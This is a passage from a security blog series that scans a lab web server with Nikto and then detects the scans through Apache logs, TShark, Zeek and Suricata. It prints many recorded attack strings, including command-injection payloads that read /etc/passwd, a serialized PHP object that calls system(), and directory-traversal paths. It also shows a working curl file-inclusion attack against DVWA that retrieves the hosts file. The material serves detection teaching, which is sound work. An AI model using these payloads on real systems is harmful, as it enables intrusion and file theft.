 00B0  4E 54 20 31 30 2E 30 3B  20 57 69 6E 36 34 3B 20   NT 10.0;  Win64; 
 00C0  78 36 34 29 20 41 70 70  6C 65 57 65 62 4B 69 74   x64) App leWebKit
 00D0  2F 35 33 37 2E 33 36 20  28 4B 48 54 4D 4C 2C 20   /537.36  (KHTML, 
 00E0  6C 69 6B 65 20 47 65 63  6B 6F 29 20 43 68 72 6F   like Gec ko) Chro
 00F0  6D 65 2F 37 34 2E 30 2E  33 37 32 39 2E 31 36 39   me/74.0. 3729.169
 0100  20 53 61 66 61 72 69 2F  35 33 37 2E 33 36 0D 0A    Safari/ 537.36..
 0110  43 6F 6E 6E 65 63 74 69  6F 6E 3A 20 4B 65 65 70   Connecti on: Keep
 0120  2D 41 6C 69 76 65 0D 0A  48 6F 73 74 3A 20 31 30   -Alive.. Host: 10
 0130  2E 30 2E 30 2E 31 30 36  0D 0A 0D 0A               .0.0.106 ....

That's it. Moving on.

Posted by at No comments:
Labels: , , , , , , ,

Beginning Nikto - Command Execution / Remote Shell

This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the hack and its detection. 

From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata.

The Hack - Beginning Nikto - Command Execution / Remote Shell 

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -nossl -no404 -Tuning 8                                                                                                                                                    
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.0.0.106
+ Target Hostname:    10.0.0.106
+ Target Port:        80
+ Start Time:         2023-06-07 15:54:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
+ /cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /cgi.cgi/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Retrieved x-powered-by header: PHP/8.0.28.
+ OpenSSL/1.1.1t appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ PHP/8.0.28 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 - Redirects (302) to http://10.0.0.106/dashboard/ , phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.
+ ...
+ /index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 - Redirects (302) to http://10.0.0.106/dashboard/ , phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.
+ /?-s - Redirects (302) to http://10.0.0.106/dashboard/ , PHP allows retrieval of the source code via the -s parameter, and may allow command execution.
+ 1074 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-06-07 15:54:22 (GMT-4) (2 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Looking at above, one may immediately draw the conclusion that this site is vulnerable. However, we know from our previous posts, the parameters referenced by "index.php" such as name, does not exist on this page.


Detect - Log Analysis

Jumping straight to the decoding of the URLs. Take a look at the first 7 lines with parameters that needs decoding.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ cat access.log |grep --perl-regexp '\?.*?\s+HTTP' --only-matching  | grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | sort --unique | head --lines=7
%0acat%0a/etc/passwd%0a 
aaaaaaaa 
action=load&whois=%3Bid 
action=modify_user 
APP=qmh-news&TEMPLATE=;ls%20/etc| 
arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D 
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22

Decoding above and others via urldecode.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ cat access.log |grep --perl-regexp '\?.*?\s+HTTP' --only-matching  | grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | sort --unique | awk --field-separator=' ' '{ system("urlencode -d "$1) }'
...
aaaaaaaa
action=load
action=modify_user
alert-debug.log
arguments=O:12:"vB_dB_Result":2:{s:5:"
/bin/cat /etc/passwd
cat
cat /etc/hosts
cat /etc/passwd
cat /etc/passwd 
/c dir
/c dir c:\
/c dir c:\"
/c dir /OG
cli=aa aa'cat /etc/hosts
cmd=cat /etc/passwd
cmd=dir c:\\
command=savesetup
conn.log
/c ver
data=Download
dns.log
email=x
/etc/passwd
_MAILTO=xx
message=test\
name=forums
name=Forums
name=Network_Tools
name=PNphpBB2
Nikto=forums
Nikto=Forums
pass= 
process
QALIAS=x
Qname=root
QNikto=root
query=AAA
realname=aaa
realNikto=aaa
reporter.log
-s
sd=ls /etc
server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF
type=Library
-v
WSDL
xsl=/vcs/vcs_home.xsl&cat "/etc/passwd"&

We already know most of those parameters are non-existent. Additionally, the host running this webserver is Windows based on not Linux. 



Detect - Packet Analysis

Setup for packet analysis. Capture packets on ports 80,443

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$tshark -n -w tuning_1.pcap -f 'tcp port(80 or 443)' --interface eth0

Decoding the URLs from the packet data.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ tshark -n -r tuning_8.pcap -Y 'http.request.method == "GET"' -T fields -e http.request.uri | grep --perl-regexp '\?.*' --only-matching | \
grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | \
awk --field-separator='HTTP' '{ print $1 }' | sort --unique | \
awk --field-separator=' ' '{ system("urlencode -d "$1) }'

cat
/etc/passwd

aaaaaaaa
action=load
action=modify_user
cat /etc/passwd
cat /etc/hosts
/c dir
/c dir c:"
/c dir c:\
/c dir /OG                                                                                                                                                                                                                                 
cli=aa aa'cat /etc/hosts                                                                                                                                                                                                                   
cmd=cat /etc/passwd                                                                                                                                                                                                                        
cmd=dir c:\                                                                                                                                                                                                       
command=savesetup                                                                                                                                                                                                                          
/c ver                                                                                                                                                                                                               
data=Download                                                                                                                                                                               
...
name=forums
name=Forums
name=forums
name=Network_Tools
name=Forums
name=PNphpBB2
name=PNphpBB2
Nikto=forums
Nikto=Forums
Nikto=forums
Nikto=Forums
pass= 
QALIAS=x
/bin/cat /etc/passwd
Qname=root
cat /etc/passwd 
QNikto=root
cat /etc/passwd 
query=AAA
realNikto=aaa
-s
sd=ls /etc
realname=aaa
server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF
t=2
t=2
type=Library
type=Library
WSDL
xsl=/vcs/vcs_home.xsl&cat "/etc/passwd"&

Not much more to do here. Transitioning to Zeek

Detect - Zeek Analysis

Setup Zeek

┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]
└─$ sudo zeek --iface any --no-checksums

Analyzing http.log file.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ cat http.log | grep --perl-regexp "\s+\/.*?\s+" --only-matching | \
grep --perl-regexp '\?.*' --only-matching | grep --invert-match "phpinfo" | \
cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | \
sort --unique | awk --field-separator=' ' '{ system("urlencode -d "$1) }'
aaaaaaaa
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(wireshark),121(bluetooth),133(scanner),141(vboxsf),142(kaboxer),147(docker)
action=load
action=modify_user
...
sd=ls
server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF
sh: 1: Syntax error: "(" unexpected
t=2
type=Library
type=Library
user=cpanel
user_id=1
-v
WSDL
x0acatx0a/etc/passwdx0a

The above information is the same that was seen in the log and packet analysis sections. Difference being it was extracted from the http.log file of Zeek.

Detect - Suricata (IDS) Analysis

Setup Suricata to operate in IDS mode

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all

Wrap this up with suricata.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5                                                                                               
     45 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt 
     23 1:2009361:8] ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt 
     22 1:2009362:7] ET WEB_SERVER /system32/ in Uri - Possible Protected Directory Access Attempt 
     14 1:2021390:3] ET WEB_SPECIFIC_APPS WEB-PHP RCE PHPBB 2004-1315 
     12 1:2100982:12] GPL EXPLOIT unicode directory traversal attempt

The one that we will extract here is the 23 "1:2009361:8] ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt "

What is the rule looking for?

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ grep "2009361" /var/lib/suricata/rules/suricata.rules | fmt
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET
WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt";
flow:to_server,established; http.uri; content:"/cmd.exe"; nocase;
reference:url,doc.emergingthreats.net/2009361; classtype:attempted-recon;
sid:2009361; rev:8; metadata:created_at 2010_07_30, updated_at
2020_09_14;)

Rule is looking to ensure the 3-way handshake is completed and that the traffic is going to the server. The server in this case, is the device that sent the SYN-ACK as part of establishing the session during the three-way handshake. It is also looking for the content "/cmd.exe" in the URI. Let's find that packet, where "/cmd.exe" is in the URI

ALERT CNT:           1
ALERT MSG [00]:      ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt
ALERT GID [00]:      1
ALERT SID [00]:      2009361
ALERT REV [00]:      8
ALERT CLASS [00]:    Attempted Information Leak
ALERT PRIO [00]:     2
ALERT FOUND IN [00]: STATE
ALERT IN TX [00]:    49
PAYLOAD LEN:         211
PAYLOAD:
 0000  47 45 54 20 2F 63 67 69  2D 62 69 6E 2F 63 6D 64   GET /cgi -bin/cmd
 0010  2E 65 78 65 3F 2F 63 2B  64 69 72 20 48 54 54 50   .exe?/c+ dir HTTP
 0020  2F 31 2E 31 0D 0A 48 6F  73 74 3A 20 31 30 2E 30   /1.1..Ho st: 10.0
 0030  2E 30 2E 31 30 36 0D 0A  43 6F 6E 6E 65 63 74 69   .0.106.. Connecti
 0040  6F 6E 3A 20 4B 65 65 70  2D 41 6C 69 76 65 0D 0A   on: Keep -Alive..
 0050  55 73 65 72 2D 41 67 65  6E 74 3A 20 4D 6F 7A 69   User-Age nt: Mozi
 0060  6C 6C 61 2F 35 2E 30 20  28 57 69 6E 64 6F 77 73   lla/5.0  (Windows
 0070  20 4E 54 20 31 30 2E 30  3B 20 57 69 6E 36 34 3B    NT 10.0 ; Win64;
 0080  20 78 36 34 29 20 41 70  70 6C 65 57 65 62 4B 69    x64) Ap pleWebKi
 0090  74 2F 35 33 37 2E 33 36  20 28 4B 48 54 4D 4C 2C   t/537.36  (KHTML,
 00A0  20 6C 69 6B 65 20 47 65  63 6B 6F 29 20 43 68 72    like Ge cko) Chr
 00B0  6F 6D 65 2F 37 34 2E 30  2E 33 37 32 39 2E 31 36   ome/74.0 .3729.16
 00C0  39 20 53 61 66 61 72 69  2F 35 33 37 2E 33 36 0D   9 Safari /537.36.
 00D0  0A 0D 0A

Nothing meaningful left here to review.

Posted by at No comments:
Labels: , , , , , , ,

Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string

This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the hack and its detection

From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata.

The Hack - Remote File Retrieval with evasion type 4 -> Prepend long random string

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -Format json -o /tmp/nikto.json -nossl -no404 -Tuning 5 -evasion 4
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.0.0.106
+ Target Hostname:    10.0.0.106
+ Target Port:        80
+ Using Encoding:     Prepend long random string
+ Start Time:         2023-06-06 15:13:18 (GMT-4)
---------------------------------------------------------------------------
...
+ /index.php?download=/winnt/win.ini - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server.
+ /index.php?download=/windows/win.ini - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server.
+ /index.php?download=/etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server.
+ /index.php?|=../../../../../../../../../etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ /index.php?page=../../../../../../../../../../etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
...
+ 925 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-06-06 15:13:20 (GMT-4) (2 seconds)
---------------------------------------------------------------------------

Above everything shows 302. Hence I'm concluding this test was not successful.

Besides, we already learned previously that index.php does not have a parameter name "page" and there is none for "download". More importantly, /etc/passwd is found on Linux not Windows so those results are not valid for this purpose.

Leveraging my knowledge of the DVWA app to actually exploit this. Rather than using the web application directly, I will leverage curl to attempt to read the "c:\windows\system32\drivers\etc\hosts" file.

If we inspect the page, we see a "page" parameter. By default, the value is "include.php"

http://10.0.0.106/dvwa/vulnerabilities/fi/?page=include.php

Using curl:

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ curl --request GET --location "http://10.0.0.106/dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts"                                                                                               
# Copyright (c) 1993-2009 Microsoft Corp.
# ...
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost
10.0.0.107 mycooldomain.cdw
<!DOCTYPE html>

<html lang="en-GB">

        <head>
                <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

                <title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)</title>
...

We can see above, just before the original page loads, the next from the host files.

Transitioning to log analysis.

Detect - Log Analysis

Looking at the first entry in the access.log we see a large set of random characters, prepended to the query.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat access.log | head -1
10.0.0.107 - - [06/Jun/2023:15:12:49 -0400] "GET /P4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmv/../ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"

Looking for something meaningful. Looking for entries where the response code is 200.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat access.log | grep --perl-regexp "\s+200\s+"
10.0.0.107 - - [06/Jun/2023:15:12:50 -0400] "GET /0RHy...JUNK...EkwGH/../favicon.ico HTTP/1.1" 200 30894 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.107 - - [06/Jun/2023:15:12:51 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.107 - - [06/Jun/2023:15:12:51 -0400] "TRACE /eaXa8sc4...JUNK...Wlt5N/../ HTTP/1.0" 200 721 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"

Nothing meaningful above. What else is there?

Looking at the paths. How many were there?

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat access.log | grep --perl-regexp "\.\..*?HTTP" --only-matching | \
sort --unique | awk --field-separator="HTTP" '{ print $1 }' | wc --lines                                                                                       
667

Getting a snapshot of some of these.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat access.log | grep --perl-regexp "\.\..*?HTTP" --only-matching | sort --unique | \
awk --field-separator="HTTP" '{ print $1 }'  
./0.alz 
../0.cer 
../0.egg
...
../autohtml.php?op=modload&mainfile=x&name=/etc/passwd 
../backup.alz 
...
./cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1 
../cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1 
../cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1 
../cgi-bin/guestbook.cgi 
../cgi-bin/helpdesk.cgi 
../cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00 
../cgi-bin/htgrep?file=index.html&hdr=/etc/passwd 
../cgi-bin/htmlscript?../../../../../../../../../../etc/passwd 
../cgi-bin/htsearch?exclude=%60/etc/passwd%60 
...
../cgi-bin/input2.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\ 
../cgi-bin/input.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\
...
./magento/magmi-importer/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility 
../magento/magmi-importer/web/download_file.php?file=../../app/etc/local.xml 
../magento/magmi-importer/web/download_file.php?file=../../../../../../../../../../../etc/passwd 
../magento/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility 
...

Moving on to what an actual attack looks like, as we already know from above, there were only 2 entries that returned response code 200.

What does the log look like for an actual successful attack?

10.0.0.107 - - [07/Jun/2023:14:36:24 -0400] "GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 4005 "-" "curl/7.88.1"

At this point, we need to review the system to see if that file exists. If it does, then you have to wonder what information was exposed. Do note, all systems tend to have a host file and Windows definitely have the host file in that location. Maybe the packet analysis will help to add more clarity.


Detect - Packet Analysis

Setup for packet analysis. Capture packets on ports 80,443

Get the streams where the response code was 200


┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ tshark -n -r tuning_5.pcap -Y 'http.response.code == 200' -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.stream -e tcp.len -E header=y                                                                                        
ip.src  ip.dst  tcp.srcport     tcp.stream      tcp.len
10.0.0.106      10.0.0.107      80      4       549
10.0.0.106      10.0.0.107      80      8       187
10.0.0.106      10.0.0.107      80      9       0

Looking at stream 4, we see it is the favicon.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ tshark -n -r tuning_5.pcap -q -z follow,tcp,ascii,4 | grep --perl-regexp "\s+200\s+" --before-context=7  --after-context=10                                                                                                        
GET /0RHy...JUNK...kwGH/../favicon.ico HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 10.0.0.106
Connection: Keep-Alive


        1460
HTTP/1.1 200 OK
Date: Tue, 06 Jun 2023 19:12:50 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Thu, 16 Jul 2015 15:32:32 GMT
ETag: "78ae-51affc7a4c400"
Accept-Ranges: bytes
Content-Length: 30894
Keep-Alive: timeout=5, max=48
Connection: Keep-Alive
Content-Type: image/x-icon

Detecting the actual attack via packet analysis

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ tshark -n -r fi.pcap 
    1 0.000000000   10.0.0.107 → 10.0.0.106   TCP 74 59456 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=1949226976 TSecr=0 WS=128
    2 0.000252977   10.0.0.106 → 10.0.0.107   TCP 66 80 → 59456 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM
    3 0.000288567   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0
    4 0.000369486   10.0.0.107 → 10.0.0.106   HTTP 210 GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1 
    5 0.009548711   10.0.0.106 → 10.0.0.107   TCP 1514 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
    6 0.009548962   10.0.0.106 → 10.0.0.107   TCP 1514 80 → 59456 [ACK] Seq=1461 Ack=157 Win=2102272 Len=1460 [TCP segment of a reassembled PDU]
    7 0.009548998   10.0.0.106 → 10.0.0.107   TCP 1514 80 → 59456 [ACK] Seq=2921 Ack=157 Win=2102272 Len=1460 [TCP segment of a reassembled PDU]
    8 0.009549028   10.0.0.106 → 10.0.0.107   HTTP 125 HTTP/1.1 200 OK  (text/html)
    9 0.009599451   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=157 Ack=1461 Win=64128 Len=0
   10 0.009615795   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=157 Ack=2921 Win=63488 Len=0
   11 0.009623869   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=157 Ack=4381 Win=62592 Len=0
   12 0.009635647   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=157 Ack=4452 Win=62592 Len=0
   13 0.011856522   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [FIN, ACK] Seq=157 Ack=4452 Win=64128 Len=0
   14 0.012227611   10.0.0.106 → 10.0.0.107   TCP 60 80 → 59456 [ACK] Seq=4452 Ack=158 Win=2102272 Len=0
   15 0.012227889   10.0.0.106 → 10.0.0.107   TCP 60 80 → 59456 [FIN, ACK] Seq=4452 Ack=158 Win=2102272 Len=0
   16 0.012271428   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=158 Ack=4453 Win=64128 Len=0

How many conversations were part of this communication?

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ tshark -n -r fi.pcap -q -z conv,tcp
================================================================================
TCP Conversations
Filter:<No Filter>
                                                           |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                                           | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.0.0.107:59456           <-> 10.0.0.106:80                    7 4,853 bytes       9 662 bytes      16 5,515 bytes     0.000000000         0.0123
================================================================================

Following stream 0.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ tshark -n -r fi.pcap -q -z follow,tcp,ascii,0

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 0
Node 0: 10.0.0.107:59456
Node 1: 10.0.0.106:80
156
GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1
Host: 10.0.0.106
User-Agent: curl/7.88.1
Accept: */*


        1460
HTTP/1.1 200 OK
Date: Wed, 07 Jun 2023 18:36:24 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
X-Powered-By: PHP/8.0.28
Set-Cookie: security=low; path=/
Set-Cookie: PHPSESSID=vba6pa2had7c86op2lnluit7v5; expires=Thu, 08-Jun-2023 18:36:24 GMT; Max-Age=86400; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4005
Content-Type: text/html;charset=utf-8

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#.127.0.0.1       localhost
#.::1             localhost
10.0.0.107 mycooldomain.cdw
<!DOCTYPE html>

The packet analysis confirms our log analysis findings. The file was successfully retrieved, hence we see the full contents above. As we say in the SANS SEC503 - Network Monitoring and Threat Detection - Packets or it did not happen. This is clear evidence of this.

Transitioning to Zeek

Detect - Zeek Analysis

Setup Zeek.

┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]
└─$ sudo zeek --iface any --no-checksums


┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat http.log | grep --perl-regexp "\s+200\s+" | head --lines=1                                                                                                                                                                     
1686078799.407770       C0NrKC2wb8TbvK0iZb      10.0.0.107      39234   10.0.0.106      80      53      GET     10.0.0.106      /0RHy...JUNK...wGH/../favicon.ico      -       1.1     Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36    -       0       30894   200     OK      -       -       (empty) -       -       -       -       -       -       F0bkFD4SgqIlRoiaQf     -       image/x-icon

Looking at the the actual attack traffic. We see similar to what we saw in our log analysis of the access.log file.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat http.log  

1686163005.810950       C7ccD83WRZobza0Lj9      10.0.0.107      59456   10.0.0.106      80      1       GET     10.0.0.106      /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts     -       1.1   curl/7.88.1      -       0       4005    200     OK

Detect - Suricata (IDS) Analysis

Setup Suricata to operate in IDS mode

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all


What did the IDS produce? Looking at the first 5 entries.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5                                                                                                               
    120 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt 
     16 1:2018056:4] ET WEB_SERVER Possible XXE SYSTEM ENTITY in POST BODY. 
      6 1:2021951:3] ET EXPLOIT Possible Magento Directory Traversal Attempt 
      4 1:2101402:9] GPL EXPLOIT iissamples access 
      4 1:2101245:13] GPL EXPLOIT ISAPI .idq access

Nothing above that I would like to dig deeper into.

Looking at the actual attack from the IDS perspective.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat fast.log 
06/07/2023-14:36:45.810950  [**] [1:2009362:7] ET WEB_SERVER /system32/ in Uri - Possible Protected Directory Access Attempt [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 10.0.0.107:59456 -> 10.0.0.106:80

Looking at the packet.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat alert-debug.log 
+================
TIME:              06/07/2023-14:36:45.810950
PKT SRC:           wire/pcap
SRC IP:            10.0.0.107
DST IP:            10.0.0.106
PROTO:             6
SRC PORT:          59456
DST PORT:          80
TCP SEQ:           2738297529
TCP ACK:           2364260716
